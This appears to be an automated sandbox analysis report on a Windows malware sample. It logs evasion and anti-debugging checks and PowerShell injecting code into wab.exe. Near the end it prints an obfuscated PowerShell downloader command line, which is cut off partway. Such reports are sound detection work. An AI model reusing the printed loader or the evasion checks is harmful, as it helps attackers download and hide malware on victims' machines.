Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 528AAD9
Source: wab.exe, 00000015.00000002.2589661383.00000000228A5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 2F20000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 22870000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 24870000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5056 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4798 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6671 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3071 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 2426 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 2452 Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 6044 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7952 Thread sleep count: 6671 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7948 Thread sleep count: 3071 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7984 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -14757395258967632s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 744 Thread sleep count: 2426 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -99875s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 744 Thread sleep count: 2452 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -99766s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -99641s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -99531s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -99422s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -99313s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -99188s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -99063s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -98938s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -98828s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -98714s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -98603s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -98500s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -98391s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -98266s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -98156s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -98047s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -97938s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -97813s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -97688s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -97575s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -97466s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -97356s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 336 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99875 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99766 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99641 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99531 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99422 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99313 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99188 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 99063 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98938 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98828 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98714 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98603 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98500 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98391 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98266 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98156 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 98047 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97938 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97813 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97688 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97575 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97466 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 97356 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wab.exe, 00000015.00000002.2589661383.00000000228A5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: wab.exe, 00000015.00000002.2589661383.00000000228A5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: powershell.exe, 0000000F.00000002.2558761352.00000262E4710000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWiA%SystemRoot%\system32\mswsock.dll;
Source: wscript.exe, 00000000.00000003.1215407662.000001CB08443000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1214778562.000001CB0665F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1214864710.000001CB08443000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1214389923.000001CB08443000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215082660.000001CB0665F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000002.2577739206.0000000006F51000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wab.exe, 00000015.00000002.2577739206.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: wab.exe, 00000015.00000002.2577739206.0000000006F33000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: wscript.exe, 00000000.00000003.1215407662.000001CB08443000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1214864710.000001CB08443000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1214389923.000001CB08443000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_02F270E0 CheckRemoteDebuggerPresent, 21_2_02F270E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_02A3D6F8 LdrInitializeThunk, 19_2_02A3D6F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: amsi64_7636.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7636, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7904, type: MEMORYSTR
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4460000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2F2FCB0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Rundtenommer.Rhy && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly Unscrambles Islndingers198 Fetichdyrkernes Stadioners Impossible236 manhunts Counterpropagations Regnestokkene Arbejdsdelings Reactualizations maurernes fodrodsknoglerne Fjerntboendes247 Periangiocholitis103 Cykelkdernes Alisphenoid Hispidity Velplejede Noggings Mntvaskeriernes uskadeliggjort Isoptic Aminoketone housemaidenly';If (${host}.CurrentCulture) {$cyperaceous++;}Function Lecithalbumin($Transfusionskanylerne){$tysklandsrejse=$Transfusionskanylerne.Length-$cyperaceous;$Undersupplied='SUBsTRI';$Undersupplied+='ng';For( $Elisioner=2;$Elisioner -lt $tysklandsrejse;$Elisioner+=3){$Unscrambles+=$Transfusionskanylerne.$Undersupplied.Invoke( $Elisioner, $cyperaceous);}$Unscrambles;}function Rysters($Baksningers){ & ($Datolinjerne) ($Baksningers);}$Eftersprgslens107=Lecithalbumin 'VkMNoo oz Mi.nl Nl ea.i/ .5Fj.G.0 m E.(PhW ,i Sn.edFao SwUms F ,N,aT S Su1,u0H .Cy0in;ov A,W oiT,nL,6Tr4Va;O. OsxGa6Do4d ;Cl Cor EvSe: S1,i2Ne1Re. e0Pl)Pe .dGE eStcBak Ho ,/ V2Sa0Dy1Th0 .0Me1Om0 .1fo RoFAri rBeePifvaoadxK,/af1re2 i1.c.Ad0Se ';$Mottolike90=Lecithalbumin 'GeUL.sPheSurLu- .A .g BeS.nAptRu ';$Impossible236=Lecithalbumin ',ahCat ntHepP.s U:Ug/ C/ SdEnrPliSmv,eeIn.,ag AoDaoDjg ,lThe A.F cEnoDimUf/SyuDacHo?,oe IxUnpEpoKarN.tFo=U dXxo MwUnnSylJooEpaG,dTh&Bui ,d h=in1,cySuz eBaOA RZilReWP dCoW .KAtE S1Gu5 eSpn,o4T vgl7Cat u0Pay.ymalp.l9Bl6 DmcrbTr-ArKBrlKrURuQ u ';$Oversocially=Lecithalbumin 'Re>Br ';$Datolinjerne=Lecithalbumin ' Gi Bea,x F ';$Biles='Regnestokkene';$ekstemporeringernes = Lecithalbumin 'MieLocBrhElo,f do%Pea,up apM d .a,ptsoaIt%,u\PoRPiuB,n.ad,ktS,e .nCoo.fmSemHye r E.AtR Uh Dy S K& .&Mi ReRecGlhBroPe T tHo ';Rysters (Lecithalbumin '.r$e.g AlBlo mbTia AlU.: BDUni ,a DcVao .dSyiSioB nVa1Sm2K.5 u=St(YecT.mHedPo P/.ycTe Te$,ae Sk.osKotAneUrm ip,noP r,eeSjrReiD,n agPrePsr tnS.eD.sR.)Po ');Rysters (Lecithalbumin 'Fo$IngG,lStoT.bS.aexl.l:AlSnotSoag d .iBro RnCee lr sMo=,e$brI im.epUnoNosAfsBriHeb Pl.oeDa2Ud3 ,6Ga.Scs Rp Dl,hiret T(L.$BeO PvC,e SrResVioHjc PiFeaE.lKll CyU.) G ');Rysters (Lecithalbumin 'M.[ eNV,eSctKa.JuS beSmrPivEsiPoc Ge TP mo DiManRltCoMMiakonhea .g.neThrSu]Or:In:.eSFueAlc u arSti St,eyLaPRur no ntC oalcMio.olS ,r=Ke Ly[PrN Se ,t ,.SpS .e .cDeu,tr NiSet DyRoPBir OoBitTeoCocLso ulKaTT.y op e.l],o:Fo:SyTSkls,sb 1Tj2H ');$Impossible236=$Stadioners[0];$Cottonopolis= (Lecithalbumin 'In$lig.dlL.o LbOraJal L:PrU,nt ,y,opKoi s.rkP,eTisP.=flN.geFiw ,-OuOD bn j,neDicw.t a 